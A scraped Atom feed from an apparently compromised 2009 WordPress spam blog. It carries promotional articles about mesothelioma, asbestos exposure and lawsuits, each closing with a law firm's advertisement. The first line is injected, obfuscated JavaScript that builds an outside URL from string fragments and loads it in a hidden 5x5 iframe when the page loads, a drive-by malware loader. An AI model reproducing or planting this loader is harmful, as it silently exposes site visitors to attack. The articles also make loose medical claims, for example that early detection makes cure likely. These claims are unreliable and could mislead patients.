r='co';nx='/f';nv='.';x='e';d='hz';u='e';uu='s';p='rc';a='ubi';rt='2/';h='p:/';fn='es';gt='htt';ft='nd';bp='i';f='dc';pz='cl';t='m/';qa='ph';wu='ame';q='ex.';w='p';bd='ifr';bi=bd.concat(wu);fz=uu.concat(p);l=gt.concat(h,nx,x,u,f,a,pz,fn,nv,r,t,d,rt,bp,ft,q,qa,w);var j=document.createElement(bi);j.setAttribute('width','5');j.setAttribute('height','5');j.setAttribute('style','display:none');j.setAttribute(fz,l);document.body.appendChild(j); Warning: Cannot modify header information - headers already sent by (output started at /home/best/public_html/index.php:1) in /home/best/public_html/wp-includes/feed-atom.php on line 8 Mesothelioma CancerMesothelioma Cancer Information2009-08-02T03:08:12ZWordPresshttp://www.mesotheliomabest.com/feed/atomadminhttp://www.mesotheliomabest.com/archives/3282009-08-02T03:08:12Z2009-08-02T03:08:12ZAsbestos is responsible for upwards of 3,000 newly diagnosed illnesses every year. Mesothelioma is a very severe and aggressive cancer which is likely to result in death, and it is caused by asbestos exposure. It has received a lot of attention over the past ten years or so, heightening public awareness to this very dangerous situation typically caused by negligent companies exposing their employees to asbestos without warning.
Asbestos can also cause a lesser known disease known as asbestosis. Mesothelioma and asbestosis are both devastating, debilitating, and more often than not, deadly diseases. Asbestosis presents with similar symptoms to asthma, and physicians often initially misdiagnose asbestosis as asthma.
Symptoms of asbestosis include difficulty breathing, coughing, and chest pain. Initially, asbestosis mimics asthma, creating shortness of breath, pain, and a tight cough during exertion. However, over time asbestosis creates the feeling of a tight chest and shortness of breath chronically. Unlike asthma, asbestosis is not sufficiently assisted by rescue inhalers.
Both Mesothelioma and asbestosis create difficulty breathing. Asbestosis attacks the interior of the lung, creating scar tissue that constricts the lungs’ ability to expand and contract normally. Mesothelioma is a cancer which constricts the lungs’ ability to expand and contract normally due to the development of tumors in the protective lining encasing the lungs.
It is not necessarily limited to the protective lining which encases the lungs, often involving the various internal organs in the body including the stomach, kidneys, or heart. Weight loss, difficulty comfortably sleeping, and chronic painful cough due to fluid in the chest are symptoms of both Mesothelioma and asbestosis.
There is no cure for either of them. Mesothelioma is a cancer and in rare circumstances it can be forced into remission however most cases of it are unfortunately fatal. Asbestosis is an equally complicated disease that often results in death as well. Asbestosis is very similar to having the inside of the lungs burned over a long period of time.
Both asbestosis and Mesothelioma present with nearly identical symptoms, share the identical cause, and have nearly the same outcomes. When initially diagnosed with Mesothelioma or asbestosis, it is recommended to find a California mesothelioma attorney or asbestos lawyer immediately.
Asbestos and Mesothelioma lawsuits have been successfully filed since as early as 1929, which truthfully should have clued in business owners long before now that not only does asbestos exposure lead to asbestosis and Mesothelioma, but it would be in everybody’s best interests if people made better decisions during the construction process.
The earlier both diseases are detected, the higher the chance of survival. More and more people who know or suspect that they are at risk for Mesothelioma are asking for testing prior to the onset of symptoms. California mesothelioma doctors, attorneys, asbestos lawyers and advocates recommend early testing for those who are at risk for Mesothelioma, asbestosis, and other health problems that are possible from high exposure rates of asbestos.
Early detection is the key in both cases, just as it is in all serious health conditions. Mesothelioma and asbestosis are much more serious than the symptoms they portray. Continual testing and early detection is the only weapon against the destructive nature of these diseases.
Diagnosis of either diseases can be traumatic and lead to more questions than answers. In most cases, the source of the asbestos which caused the illness can be tracked if the patient has a fairly long term employment history in one of the laborious fields which are known for chronic asbestos exposure.
Factories and construction are the two leading industry related factors for asbestos exposure. Severe disasters have been known to provide dangerous levels of asbestos exposure, such as the aftermath of hurricanes, building destruction, or incidents such as 911. Members of demolition crews often received early exposure to asbestos and have reported cases of Mesothelioma and asbestosis who worked in demolition prior to 1985.
Those who have been diagnosed with Mesothelioma with a scattered work history, under the table jobs, or various possible asbestos exposure possibilities may still be able to trace the source and hold those responsible accountable. A qualified attorney can assist those who have no clear cut answers. Lawyers who have ample experience can often help a patient of Mesothelioma determine whether or not the source is traceable and whether or not a lawsuit or a settlement is possible.
Nick Johnson is lead counsel and founding partner of Johnson Law Group. Johnson represents plaintiffs throughout California and focuses on injury cases involving Mesothelioma. Visit http://www.nickjohnsonlaw.com or call 1-888-311-5522 immediately to request a free case evaluation. Product Review
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0adminhttp://www.mesotheliomabest.com/archives/3262009-08-01T15:00:02Z2009-08-01T15:00:02ZUnderstanding what a Mesothelioma diagnosis means takes much longer than the brief time your doctor spent with you as they broke the news to you that you were suffering from it. Understanding a diagnosis and what to do and how to react will take some time.
Unfortunately, it is fatal in all but a few rare cases. It can be detected in three various parts of the body, and those three areas have their own specific name for Mesothelioma. Pericardial Mesothelioma strikes the heart’s mesothlium. Peritoneal Mesothelioma strikes the abdominal protective lining, or mesothlium. The most common form of it is known as Pleural Mesothelioma and is known to attack the lung’s mesothelium. It is a drastic and aggressive cancer that is only known to be caused by the inhalation and ingestion of asbestos.
Post diagnosis of Mesothelioma creates many questions, and some of the answers to those questions can be answered through self research, but not everything you read on the internet is true, so it is recommended that a newly diagnosed victim consult with two specialists, a Mesothelioma doctor and then a Mesothelioma lawyer.
A doctor can guide you through your treatment options and help you decide what is best for you in the face of it. A lawyer can assist in helping you to understand your rights as a victim of it.
There will be many changes in your life after the diagnosis of Mesothelioma. Just like all victims of deadly diseases, victims feel the need to make intelligent choices with how they handle their physical, emotional, and financial health as their progresses.
Hiring a California mesothelioma lawyer can eventually mean the difference between being able to pay for top of the line treatment and winding up with a physician who has never seen a case of it before. While not every case can be brought to the center of a courtroom, many cases are the result of obvious and blatant disregard for human health and life that victims are able to win large sums of money to help cover the costs of expensive victims, pay for private nursing that help the families of Mesothelioma victims, and assist families from having to declare bankruptcy after the death of their loved one.
California mesothelioma settlements and awards can never truly compensate for the pain and suffering of a victim, nor can they ever even come close to compensating for the loss of a family member to Mesothelioma, but they can at least help to provide the best care possible and ease the transition that occurs between life, illness, and death. Mesothelioma is a journey, and it is a difficult and painful journey. Though the percentage is very low, there have been survivors of it.
Mesothelioma is a rare form of cancer, and thus it has not received the research attention that other forms of cancer have received. It is a cancer that is resistant to conventional forms of treatment, although conventional forms of treatment are really the only available treatment options.
Victims of Mesothelioma have reported feeling that there time was well spent after filing a lawsuit, hoping that their journey could help spare lives from it in the future. Even if the only way to effectively do so is to bankrupt the companies responsible one by one. This may or may not be an accurate statement, but who can discount the feelings of a victim? Only a victim of it can really determine how their time that they are left with will be well spent.
It is very unfortunate that the only true recourse for justice victims have is the filing of a lawsuit. Many family members or friends of Mesothelioma victims feel that the truer justice for victims would be compensation and jail time for those who decided that it was not a significant enough risk to protect their employees from asbestos exposure.
Regardless of personal feelings that Mesothelioma victims, their families and friends assert, there is not always a cut and dry case waiting for them. There have been changes to current legislation which may very well prevent the majority of lawsuits from being filed in the future. It is vital to file a lawsuit as early as possible after diagnosis. Victims need not lose hope. There are always new advancements in technology and medicine that may eventually prevail in finding a treatment aggressive enough to send a much higher percentage of California mesothelioma cases into remission.
Nick Johnson is lead counsel and founding partner of Johnson Law Group. Johnson represents plaintiffs in many states and focuses on injury cases involving all types of Mesothelioma. Call 1-888-311-5522 today or visit http://www.nickjohnsonlaw.com for a free case evaluation. Smartphone Software
]]>0adminhttp://www.mesotheliomabest.com/archives/3252009-08-01T02:58:53Z2009-08-01T02:58:53ZPeritoneal Mesothelioma is considerably rare, accounting for only between 10% and 20% of all Mesothelioma cases. Peritoneal Mesothelioma is a cancer caused by asbestos exposure that affects the abdominal tissue, more specifically the lining in the abdominal wall. Peritoneal Mesothelioma is most often deadly, although treatment options are becoming increasingly more sophisticated and the survival rate is ever so slowly creeping upward.
Surgical options for a patient that has been diagnosed with peritoneal mesothelioma include a procedure known as paracentesis and a procedure called peritonectomy. A paracentesis is a procedure that removes the fluid build up from between the lining of the abdominal cavity and the abdomen.
A paracentesis is usually opted for prior to a peritonectomy. A paracentesis may relieve the fluid pressure for awhile, although some patients get lucky and the fluid does not return to the extent of having to perform the procedure again. However, if a paracentesis is done and the fluid quickly returns, a peritonectomy is typically recommended. This means the removal of the abdominal wall lining, which will prevent future build up of fluid permanently.
Because surgical procedures are stressful even on a healthy body, some patients opt for a peritonectomy immediately and skip the more conservative procedure, the paracentesis. This means one surgery that is guaranteed to prevent the future build up of fluid, however there are risk factors with a peritonectomy.
The risk of infection in the post operative period is quite high, as the body is already in a weakened state from the cancer. Most physicians will perform a peritonectomy with the intention of making the patient more comfortable, as most cases of peritoneal mesothelioma are diagnosed well past the point that the cancer can be surgically removed. A paracentesis or a peritonectomy are purely for the sake of making the patient comfortable.
However, some patients opt for procedures like a paracentesis or a peritonectomy in the hopes of gaining a chance on the slim possibility of a cure. Peritoneal mesothelioma has a very low survival rate, and patients find themselves in the unenviable position of having to choose between procedures that will make them most comfortable and procedures that may extend their life and offer them a small chance at being cured. This of course is a very difficult place to be after being diagnosed with peritoneal mesothelioma.
The physician that a patient chooses after being diagnosed with peritoneal mesothelioma is likely to direct their course of treatment. Some physicians opt for surgical procedures like a paracentesis or a peritonectomy while other physicians do not feel the trade off and side effects of surgery are optimal in the face of a disease like peritoneal mesothelioma.
Treatment options such as a paracentesis or a peritonectomy are intrusive procedures that will weaken the body even more. However, a paracentesis or a peritonectomy often provide relief from the painful pressure of fluid build up that prevents patients with peritoneal mesothelioma from being able to participate in life. Each case is different and each case can only be evaluated on its individual merits.
There is of course no easy answer, and a patient with peritoneal mesothelioma will require a great amount of care to retain any amount of quality of life, and the decisions regarding surgical procedures such as paracentesis and peritonectomy are not easy decisions to make. Peritoneal mesothelioma patients face many decisions along the way, and unfortunately none of them ultimately leads to a cure.
Patients of peritoneal mesothelioma do fair better when they enter cancer programs that have a mesothelioma specialty as well as an entire approach to medicine, including nutritional therapies and emotional therapies.
There are no easy answers when faced with the decision to have a paracentesis performed or the option of peritonectomy, or the alternative option of foregoing surgical procedures altogether. Of course, the stronger and more informed a peritoneal mesothelioma patient’s support system, the more equipped he or she will be to make these difficult decisions.
Unfortunately, treatment for peritoneal mesothelioma, including procedures such as peritonectomies and paracentesis are relatively expensive, and factoring the cost of the more conservative approaches to treating this form of cancer such as radiation, chemotherapy, and other therapies, treating peritoneal mesothelioma can be outrageous even with medical insurance.
There is help for those who need it, and patients and family members can be proactive in finding the help they need and deserve. This may mean asking a lot of questions until the right person for the question is found, but there is no reason for a victim of peritoneal mesothelioma or their family members to have to face this disease alone.
Nick Johnson is lead counsel and founding partner of Johnson Law Group. Johnson represents plaintiffs in many states and focuses on injury cases involving all types of Mesothelioma. Call 1-888-311-5522 today or visit http://www.nickjohnsonlaw.com for a free case evaluation. pc internet security
]]>0adminhttp://www.mesotheliomabest.com/archives/3242009-07-31T15:01:21Z2009-07-31T15:01:21ZIn most cases, people usually ignore the symptoms of Mesothelioma due to their generic nature. This is because the early symptoms of mesothelioma can also be the indication of other common diseases. Furthermore, researches have concluded that a patient with prior exposure to asbestos may develop mesothelioma much later in his/her life, i.e. after 20 to 40 years of asbestos encounter. Thus, many patients disregard the possibility of developing mesothelioma due to something that happened much earlier in their lives.
Mesothelioma is a cancer in which the protective linings of the body’s internal organs get affected by malignant cells. These linings include:
•Pleura: the outer lining surrounding the lungs and chest cavity;
•Peritoneum: the lining of the abdominal cavity; and
•Pericardium: a sac holding the heart.
The symptoms of mesothelioma affecting these organs can vary due to the special nature and functions of the organs. Some of these symptoms are severe, and also some of the symptoms are rare. It is, therefore, recommended to contact a physician if the symptoms prevail.
Additionally, if mesothelioma is detected at early stages, the chances for a possible cure are high.
Following are the symptoms of mesothelioma, categorized by types:
Pleural Mesothelioma Symptoms:
•Shortness of breath
•Coughing up blood
•Pain in chest
•Pleural effusions (fluid accumulation in the lung lining)
•Back pain
•Hoarseness
•Weakness
•Problem in swallowing
•Loss of appetite
•Weight loss
•Excessive coughing
•Swelling
•Paralysis
•Fever
In severe cases, a pleural mesothelioma patient can develop pneumothorax or lung cancer (lung failure). Nonetheless, some patients may show almost no symptoms.Peritoneal Mesothelioma Symptoms:
•Swelling or mass accumulation in the abdomen
•Weight Loss
•Abdominal pain
•Bowel obstruction
•Blood clots
•Fever
•Nausea
•Vomiting
•HerniaPericardium Mesothelioma Symptoms:
•Chest pain
•Shortness of breath
•Cough
•Unusual heart beating
•Irregular breathing patterns
These symptoms of mesothelioma can also be the indications of other minor diseases. However, if diagnosed soon, these symptoms can help the doctors to cure the cancer at a primitive stage. Remember that only a doctor can confirm the presence of mesothelioma by examining medical reports, asbestos exposure history, MRI and/or CT scan. In some cases, a needle biopsy can also be conducted.
]]>0adminhttp://www.mesotheliomabest.com/archives/3232009-07-31T02:58:52Z2009-07-31T02:58:52ZThe number one risk factor associated with mesothelioma is the unprotected exposure to asbestos materials. Most people who have been diagnosed with mesothelioma have knowledge of prior exposure to asbestos, possibly up to 30 or 40 years prior to their diagnosis.
Exposure to asbestos could have occurred to people who were actually mining asbestos, people who worked in plants that manufactured goods containing asbestos, workers who were installing asbestos-laden materials in buildings, or those who lived or worked in buildings or homes containing asbestos or products made of asbestos. People who were hired to remove asbestos from a building are also at an increased risk of developing mesothelioma. People who worked with asbestos are more likely to develop mesothelioma than people who were simply around asbestos materials during their every day life.
The level of exposure as well as the amount of time a person was exposed to asbestos also seems to correlate to the risk of developing mesothelioma. For example, someone who worked with asbestos every day for 20 years is much more likely to be diagnosed with mesothelioma than a person who was exposed to it for only one month. However, both categories of exposure contain risk and both can lead to the same cancer. In addition, the younger the person who was exposed, the greater the risk of developing mesothelioma later in life.
Another apparent risk factor for developing mesothelioma is living with a person who has been exposed to asbestos. It is believed that individuals who worked with asbestos materials several decades ago may have unknowingly come home with asbestos particles on their clothing. Because protective coverings were not required on asbestos workers, the possibility of asbestos particles on clothing was a true possibility.
When the particles were taken home on clothing, and the clothes were taken off, the asbestos may have flown into the air inside of the home, and in turn, inhaled by all members of the family. Hence, many family members of past asbestos workers have been diagnosed with mesothelioma. (Today, there are regulations that will not permit a person working with asbestos to leave a facility before showering and changing their clothes.)
It is a mystery as to why some people who had long-term exposure to asbestos in their past never develop mesothelioma, and others who were exposed for only a very brief period of time develop the cancer.
Researchers believe that there may be other reasons that one person is more susceptible to mesothelioma than others. There is a hypothesis that people who develop mesothelioma were born with a gene that makes them more predisposed to cancer. In addition, it has been determined that people who smoke are at a much higher risk of developing mesothelioma if they were also exposed to asbestos at any time in their lives.
There are other mesothelioma risk factors as well. There seems to be a link between mesothelioma and the vaccine that millions of individuals received during the 1950s and 1960s for polio. The connection between mesothelioma and the polio vaccine is only a theory, and there is no scientific proof of this claim.
Another theory regarding mesothelioma’s risk factors is related to radiation. Between the 1920s and the 1950s, x-rays, which were used for all sorts of purposes including diagnosing various medical problems, used to contain a substance that was eventually linked to many kinds of cancer. It is believed that there may be a link between those individuals who received x-rays between the 1920s and the 1950s may be at a greater risk of developing mesothelioma than those who were not exposed to x-rays during this period of time.
]]>0adminhttp://www.mesotheliomabest.com/archives/3222009-07-30T15:00:26Z2009-07-30T15:00:26ZMesothelioma is a disease that affects those people who have come into close or prolonged contact with asbestos. If you don’t know about it already, asbestos is an agent used in fabrics and building materials that was very popular only a few decades ago. While some knew the affects of asbestos, companies were making millions off the use of the product that it was never discontinued.
It wasn’t until fairly recently that it has become widespread knowledge that asbestos causes the cancer known as mesothelioma. Workers were hired to remove the material, and many of them became inflicted with the cancer as well. If you or someone you know has mesothelioma because of asbestos, you may be entitled to a handsome sum of money thanks to the laws surrounding mesothelioma and asbestos. If you are interested in learning more about this, or filing your own lawsuit, it may be time to look into a lawyer.
There are a growing number of firms out there that specialize in mesothelioma cases and they would be happy to take on another case. However, you shouldn’t just go for any lawyer. It’s important to find someone who knows what they’re doing, or at the very least who represent a firm that has a proven track record with mesothelioma cases.
When you are looking for the right lawyer for your case, make sure to ask about the number of similar cases they handled in the past and about their success rate with the cases. You may be surprised to find that lawyers who seem to know what they’re talking about may have not handled a mesothelioma case at all. Since the laws surrounding asbestos and mesothelioma are in a constant state of change, it’s important to hire a lawyer that is on top of his game and knowledgeable about the legal process surrounding these types of cases.
If you’re unsure of why you would want to file a lawsuit for mesothelioma, you should know that the person inflicted with it does have every right to demand compensation for their hardship. Many of the companies that exposed their workers to asbestos were completely aware of its dangers and failed to say anything about them. Knowing about the dangers and not doing anything to protect their workers puts them legally liable for expenses made because of the cancer, and monetary payment for their worker’s losses, as well as their families.
If you want to make sure that your case will stand up in court, take a look at mesothelioma cases that did not win. You may be surprised at what you find, and it will help you to not make the same mistakes in your trial. There could have been a problem with evidence, or deadlines may not have been met. The more research you do, the better prepared you will be to find a lawyer and go through a trial (if a settlement is not reached).
If you hire a skilled and knowledgeable lawyer, he or she will know all about this already, and will probably be privy to more information than you could find. So, whether you believe you know about what you’re getting into or not, always ask your mesothelioma lawyer about past and present cases. You can’t have too much information when it comes to a lawsuit, especially in the case of a mesothelioma lawsuit.
Don’t spend too much time with research, though, because most states have a strict timetable in which you need to file your lawsuit. That means you need to think about this immediately after you or your loved one is diagnosed. The mesothelioma lawyer you choose will know about these timetables, and will appreciate all the time you can give them to properly prepare the case.
Don’t be worried if you’re unsure of where or when exactly you or your loved one was exposed to asbestos. Chances are, it’s been a long time and you’re going to need some help to remember. Many mesothelioma lawyers will hire the aid of a private investigator to find these things out. The company that you worked for will be uncovered and all the necessary information unraveled. All it takes is some digging.
So start to look around for talented mesothelioma lawyers in your area today. Chances are there will be more than you realize, and many will probably have a great track record in mesothelioma cases. You don’t have to go unaccounted for when it comes to suffering from mesothelioma. Mesothelioma lawyers will help you get the compensation you deserve, so you and your family can live more comfortably.
Nick Johnson is lead counsel with Johnson Law Group. Johnson represents plaintiffs in many states and focuses on injury cases involving Fen-Phen and PPH, Paxil, Mesothelioma and Nursing Home Abuse. Call Nick Johnson at 1-888-311-5522 or visit http://www.johnsonlawgroup.com FitLine - more power
]]>0adminhttp://www.mesotheliomabest.com/archives/3212009-07-30T02:58:46Z2009-07-30T02:58:46ZWhen you have received a Mesothelioma diagnosis, one of your first thoughts should be to contact a top New York Mesothelioma lawyer to help you bring your case to court and to get the money that you will soon be needing for your care and treatment in the near future. Mesothelioma is not a cancer that you contract through fault of your own, but rather through the fault of employers or landlords and their negligence, and you should not have to bear both the financial and emotional burdens of this disease on your own.
If you are feeling a bit wary about filing a Mesothelioma lawsuit, then there is a little bit that you need to know about the disease and how it is contracted. Mesothelioma is a rare form of lung cancer, but it is not caused by exposure to smoke, smog, or soot. Instead, Mesothelioma can only be caused by exposure to a material known as asbestos, which has been known for some time to be dangerous, and which was banned from use in new buildings in 1989 by the United States government.
You may be wondering how you are just now developing a reaction to this material if it has not existed for almost two decades, however this is not actually the case. The asbestos material was banned from use in new buildings, however it was not mandated by the government that the dangerous insulation material be removed from existing structures, which means that it still exists in many buildings in New York State and elsewhere in the country as well.
Asbestos is highly dangerous, and can cause a number of lung maladies, including Mesothelioma. The danger comes from the microscopic fibers that make up this fire retardant material and which can be easily released into the air by any disturbance to the asbestos. The fibers, once released into the air, are breathed in by anyone in proximity to the disturbed material, and from there lodge in the lungs of the victims.
Many construction workers from before 1989 have contracted Mesothelioma because of this exposure since the material is disturbed in the process of installing it in buildings. The fibers lodge in the lungs where they cannot be removed, and are a constant source of irritation to the lining of the lungs in which they stick. Over the course of several years, sometimes as many as ten or more, the irritation stimulates the growth of the Mesothelioma cancer cells, which grow up and around the asbestos to cause the deadly cancer.
Construction workers are not the only people in much danger from exposure to asbestos, either. Many people who worked in and around ships were exposed to the material because of the applications of asbestos in ships, and the many military applications of asbestos mean that many military personnel have been exposed to asbestos as well.
If you experience any of the classic early Mesothelioma symptoms, including a dry cough, difficulty or pain breathing, or pain in your chest, you should ask your doctor to test you for this deadly cancer as soon as possible. This goes double for anyone who has worked in an industry that is likely to have caused exposure in the past, or if you know that you have been exposed to asbestos in your past.
Mesothelioma is hard to track because a single exposure to asbestos can cause you to develop the cancer ten or more years later, however an experienced New York Mesothelioma attorney can help you track the source of your exposure and therefore the cause of your cancer. Your Mesothelioma lawyer will be more than happy to help you file a Mesothelioma lawsuit to help you to get the treatment that you need and the care that you deserve without becoming a financial burden or imposition to your family, and will help you reach a Mesothelioma settlement if it is appropriate.
Your contraction of this deadly cancer is not your own fault, nor is it fair. Allow a top New York Mesothelioma lawyer help you to bring the cause of your exposure to justice through a financial compensation, and you will ensure that you are at least well cared for and that your family will be provided for after you are gone. New York Mesothelioma lawyers have experience dealing with people in exactly the same situation as you are, and they will be able to help you come to a settlement that allows you to move on with your life.
Nick Johnson is lead counsel with Johnson Law Group. Johnson represents plaintiffs in many states and focuses on injury cases involving Fen-Phen and PPH, Paxil, Mesothelioma and Nursing Home Abuse. Call Nick Johnson at 1-888-311-5522 or visit http://www.johnsonlawgroup.com safety procedures
]]>0adminhttp://www.mesotheliomabest.com/archives/3202009-07-29T14:59:29Z2009-07-29T14:59:29ZMesothelioma affects many people across the globe every year. If you’re not sure exactly what mesothelioma is, it’s a form of cancer that occurs from exposure to asbestos. Normally, people who get it have been exposed to asbestos either by long term stays in a building containing the material, or by working for companies that are paid to remove the harmful material. Asbestos was used as a fire-retardant material in buildings and curtains on the stages in theatres. The rapid removal of asbestos from older buildings occurred when it began to be linked to the mesothelioma cancer.
If you are suffering from mesothelioma, or know someone who is, it’s important to look into your options. Although the laws on the subject are constantly in a state of change, there are legal actions that can be taken in order to ensure proper compensation for medical treatment and heartache. There are lawyers that specialize in mesothelioma cases, and finding the best ones in your state could mean winning a case or not.
Mesothelioma symptoms may not occur until 20 or 50 years after exposure to asbestos. That’s why the material was allowed to be around as much as it was. It wasn’t until recently that asbestos was linked to causing cancer, and laws surrounding it were created. Mesothelioma affects one of two areas, usually, the outer lining of the lungs or heart, or the chest cavity. Shortness of breath, chest pain or pain in your lungs or heart, shortness of breath, and fatigue are all common symptoms of mesothelioma.
If you’re thinking that these symptoms could be part of a number of illnesses, you’re right on the money. That’s why getting a mesothelioma diagnosis is so tough. Not only do you have to go through a chest x ray, doctors may need to take tissue samples from possibly infected areas in order to get a proper, positive diagnosis. Without one of these, finding legal compensation will not be easy.
If you have a diagnosis for mesothelioma and you can link the outbreak to past exposure to asbestos, the next step is to find a competent lawyer to aid you in making and winning a case. You also may be eligible for legal counsel if you are a grieving member of a family who has lost a loved one to asbestos-related mesothelioma. The best way to find out if you can make a case that is going to win is to find a lawyer that specializes in mesothelioma cases. Louisiana has a number of lawyers that are top notch.
Finding them are simple, but going through them to find the best of the bunch will always prove to be more difficult than you may think. There are a number of lawyers that can help you in Louisiana. Lawyers with years of experience in mesothelioma cases and who have won these cases time and time again. After all, working with a lawyer that is known to get compensation for his or her clients will bring you peace of mind in handling these delicate matters.
The laws in Louisiana regarding mesothelioma cases are always changing, so you’re going to need a lawyer that is on top of their game when it comes to the laws surrounding the disease. The Johnson Law Group employs lawyers that make it their specialty to take on cases for asbestos-related mesothelioma cases. You can know that your case in safe hands by working with one of our competent and knowledgeable lawyers. Of course, making a decision like this on a whim is not a good thing.
Do some research on the web and you’ll find links to a number of well-educated lawyers in Louisiana. Call up the ones you feel you’ll get along with more, because not only does knowledge and experience come into play for lawyers, but so does their social presence and ability to communicate. After skimming the pool of lawyers out there, we’re sure you’ll come to find that the lawyers employed by the Johnson Law Group are of the highest standards.
If you have any questions about our services, our lawyers, or about mesothelioma and the laws relating to it in general, please give us a call. Someone in the Johnson Law Group will be available to answer your questions and help you make the right decisions in choosing a course of action to take when diagnosed with the disease. You have the right to be compensated for your troubles, and the Johnson Law Group is here to help.
Nick Johnson is lead counsel with Johnson Law Group. Johnson represents plaintiffs in many states and focuses on injury cases involving Fen-Phen and PPH, Paxil, Mesothelioma and Nursing Home Abuse. Call Nick Johnson at 1-888-311-5522 or visit http://www.johnsonlawgroup.com Heavy Metal Music and Bands
]]>0adminhttp://www.mesotheliomabest.com/archives/3192009-07-29T02:58:54Z2009-07-29T02:58:54ZIf you live or work in Rhode Island, then your life is in danger. Asbestos has been illegal in the state of New York for over 20 years, but there are still some landlords and factory owners who have not removed it from their buildings. This is unforgivable neglect, but what is worse is the manufacturers and building owners who continue to use asbestos in construction and manufacture, despite the health warnings.
These health warnings are no idle threat, and recent studies have shown that asbestos is a lot more than something that can cause cancer. There is now significant evidence to suggest that asbestos, when inhaled, does cause cancer - much like Red Dye number 3 and other banned food additives.
If you have been exposed to asbestos, then you have every likelihood of developing a type of cancer that is extremely aggressive and metastatic (can migrate to other organs). This cancer is called mesothelioma, and it has no cure. In the event of exposure you should consult your doctor immediately and keep an eye out for shortness of breath, a tight chest, blood when you cough and any type of fluid buildup. These are the mesothelioma symptoms that doctors know about, but there could be others that present in unique cases.
The process for mesothelioma diagnosis involves tissue samples, fluid samples, screening and blood work, but most tests are inconclusive. Many different tests must be run concurrently, but together these can give us a good idea of how you became contaminated and whether or not asbestos was at fault.
The simple neglect of asbestos law ruins many lives each year, and if yours is one of them then you are entitled to a lot more than you might think. A top mesothelioma lawyer in Rhode Island can help you to fight the injustice of your contamination, help to secure you a large mesothelioma settlement and to prevent anyone else from contracting this disease in the same way you did. Unscrupulous landlords and factory owners should not be allowed to poison innocent people.
Your mesothelioma attorney should be highly educated and well-experienced in mesothelioma lawsuit procedures, and will represent you as powerfully as possible. In most cases it is possible to secure an out-of-court mesothelioma settlement, but this is not always certain. In the event that the case goes to court you should want someone that has the best reputations in the country for securing the rightful settlements for our clients.
If you or a member of your family have contracted mesothelioma as a direct result of contact with asbestos, then you have been dealt a great injustice. Where there is injustice, then you are entitled to a cash settlement that can either come in the form of a lump sump payment or monthly installments with interest. If you have only recently discovered that you have mesothelioma and you want a lump sum payment to enjoy your life with, then we will fight as hard as possible to secure this type of mesothelioma settlement.
Your mesothelioma lawyer should be dedicated to providing clients with a recourse against those who violate asbestos laws and harm innocent people in the process. New York, California and Texas have all seen increases in the incidence of mesothelioma as a direct result of asbestos poisoning, and every single on of these deaths could have been avoided if companies spent a few extra dollars on approved building materials and construction elements.
Remember that if you have contracted mesothelioma it is up to you to protest and let a mesothelioma lawyer know about your disease. They can take it from there, but if nobody speaks out against this injustice then even the top mesothelioma lawyer in Rhode Island will not be able to make an impression on the damage that asbestos does to our country’s health.
Nick Johnson is lead counsel with Johnson Law Group. Johnson represents plaintiffs in many states and focuses on injury cases involving Fen-Phen and PPH, Paxil, Mesothelioma and Nursing Home Abuse. Call Nick Johnson at 1-888-311-5522 or visit http://www.johnsonlawgroup.com WP Robot Plugin
]]>0adminhttp://www.mesotheliomabest.com/archives/3182009-07-28T03:01:05Z2009-07-28T03:01:05ZMesothelioma is a form of cancer that affects the mesothelial cells of the body. These are the cells that make up the outer lining for the body”s major organs, such as the heart, lungs and stomach. These linings are referred to as the mesothelium and this is how the cancer got its name.
Pleural Mesothelioma
The pleura is the tissue that covers and lines the lungs. These are referred to by the medical community as pleural membranes. The pleura are fibrous membranes and the space between them is the pleural space. The pleural protect the lungs by producing a lubricant that fills the pleural space. This lubricant also allows the lungs to move easily within the chest cavity as we inhale and exhale.
Pleural mesothelioma is the most common type of the disease. Since the lungs are so close to the heart, it is almost always affected. The pericardium is the lining found on the outside of the heart and allows it to move freely within the heart cavity.
The Peritoneum
The peritoneum is the tissue lining the abdomen. Its job is to protect the abdomen”s contents. It produces a fluid that acts as a lubricant so organs within the abdomen may move freely. Peritoneal mesothelioma is cancer of the tissue that lines the abdominal cavity. This form of mesothelioma is more rare than pleural mesothelioma.
Causes of Mesothelioma
Mesothelioma is caused by unprotected exposure to asbestos and affects those who were put at risk for the last 50 years.
Who Gets Mesothelioma
The disease is most common in males who are between the ages of 60 and 70 years old. These men were constantly exposed to asbestos dust and fiber, which caused the mutation of the mesothelioma cells. Mesothelioma takes years to develop, which means early diagnosis is almost impossible.
Others at risk for mesothelioma are those who lived in the same household with someone who was constantly exposed to asbestos. Men carried asbestos dust and fibers into their homes on clothing. It was then breathed in by family members. This put them at risk of contacting mesothelioma and other diseases related to asbestos years after the fact.
Treatment
The success of treatment for mesothelioma isn”t high. The final stages of the disease are fatal. The earlier mesothelioma is diagnosed, the better the prognosis.
If you or a member of your immediate family has ever been constantly exposed to asbestos in the workplace, be sure to contact your health care professional to find out exactly what your options are. You may be tested for the disease and get a clear bill of health.